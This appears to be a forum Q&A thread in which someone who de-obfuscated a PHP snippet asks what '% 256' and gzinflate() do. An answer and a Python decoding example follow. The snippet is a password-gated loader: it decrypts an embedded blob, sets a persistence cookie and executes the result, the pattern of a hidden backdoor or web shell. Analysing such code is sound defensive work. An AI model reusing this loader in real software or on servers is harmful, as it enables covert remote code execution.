dsjfrkvn818747 2016-01-02 06:55

Encrypted PHP code

Issue

I have some PHP code that I've been decrypting (de-obfuscating) for 2 hours. I finally got it converted back into readable code, but I still have some issues understanding the algorithm used here, because of lack of knowledge about some things in the code below.

Code

<?php

$posted = isset($_POST['posted']) ? $_POST['posted'] : (isset($_COOKIE['posted']) ? $_COOKIE['posted'] : NULL);
if ($posted!==NULL) {
    $posted= md5($posted) . substr(md5(strrev($posted)), 0, strlen($posted));
    for ($counter=0; $counter < 15324; $counter++)    {
        $idk[$counter] = chr((ord($idk[$counter]) - ord($posted[$counter])) % 256);
        $posted.=$idk[$counter];
    }

    if($idk = @gzinflate($idk)) {
        if (isset($_POST['posted']))
            @setcookie('posted', $_POST['posted']);
        $counter = create_function('', $idk);
        unset($idk, $posted);
        $counter();
    }
}

The $idk variable is already a value that contains a long string that's being base64 decoded.

What I Don't Understand

I understand almost all of the code, but I don't get what % 256 does in here and also I don't know what gzinflate() does.

1 answer

  • dtc66318 2016-01-02 07:13

    So, gzinflate() un-compresses input data that is compressed with the zlib DEFLATE algorithm. The corresponding function to compress or deflate an uncompressed string is called gzdeflate(), and its manual page provides a bit more information:

    This function compresses the given string using the DEFLATE data format.

    For details on the DEFLATE compression algorithm see the document "DEFLATE Compressed Data Format Specification version 1.3" (RFC 1951). Sparing a few details, this is similar to compressing a file using gzip myfile.txt on the Linux command line, which would create the compressed file myfile.txt.gz. In short, this is uncompressing compressed data assigned to $idk.

    $variable % 256 returns the remainder of dividing $variable by 256. If I set $variable to 258, $variable % 256 would be 2. This is often used when you want to see if a number is cleanly-divisible by another number. If I wanted to show a status-update every 100 times of a loop, for example, I might do:

    <?php
    
    for ($i = 1; $i <= 1000; ++$i)
    {
        // Do something on each loop.
    
        if (($i % 100) == 0)
        {
            echo sprintf("Loop %d of 1000; %d percent complete.\n", $i, $i / 1000 * 100);
        }
    }
    

    But there are obviously many other uses.

    As far as helping you figure out what exactly this source code does, I would recommend going through it step-by-step with real input and seeing what happens after each step. It will be hard for me to figure out much more about what it's doing without a lot more context.

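The loop in the question, worked through as an added example (not code from the asker or the answerer): a Python version that applies the same key derivation, the byte-wise subtraction with `% 256`, and the raw-DEFLATE inflate that `gzinflate()` performs, and returns the decoded source as text instead of executing it. The function names, the password and the sample blob are constructed for illustration; the real `$idk` string is not on the page.

```python
import hashlib
import zlib


def initial_key(password: bytes) -> bytearray:
    """md5($p) . substr(md5(strrev($p)), 0, strlen($p)) from the posted loader."""
    head = hashlib.md5(password).hexdigest()
    tail = hashlib.md5(password[::-1]).hexdigest()[:len(password)]
    return bytearray((head + tail).encode("ascii"))


def decode(blob: bytes, password: bytes):
    """Undo the subtraction loop, then inflate. Returns text, or None on failure.

    The result is returned for reading only; nothing here evaluates it.
    """
    key = initial_key(password)
    plain = bytearray()
    for i, c in enumerate(blob):
        # % 256 wraps the difference into 0..255 so it is a valid byte again.
        # (PHP's % can go negative; chr() then wraps it to the same byte.)
        p = (c - key[i]) % 256
        plain.append(p)
        key.append(p)  # $posted .= $idk[$counter]: output extends the key
    try:
        # gzinflate() reads raw DEFLATE (RFC 1951); wbits=-15 means no header.
        return zlib.decompress(bytes(plain), wbits=-15).decode("utf-8", "replace")
    except zlib.error:
        return None  # wrong password: almost never a valid DEFLATE stream


def make_sample(source: bytes, password: bytes) -> bytes:
    """Build a constructed test blob by running the same steps in reverse."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    plain = comp.compress(source) + comp.flush()
    key = initial_key(password) + plain
    return bytes((p + key[i]) % 256 for i, p in enumerate(plain))


# Constructed sample: a harmless PHP statement and a made-up password.
SOURCE = b"echo 'hello from the decoded stage';"
SAMPLE = make_sample(SOURCE, b"example-pass")

if __name__ == "__main__":
    print(decode(SAMPLE, b"example-pass"))
    print(decode(SAMPLE, b"wrong-guess"))
```

Decoding a real sample this way needs the value sent in `posted`; without it the inflate step almost always fails, which is what the `if($idk = @gzinflate($idk))` check in the question's code relies on.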
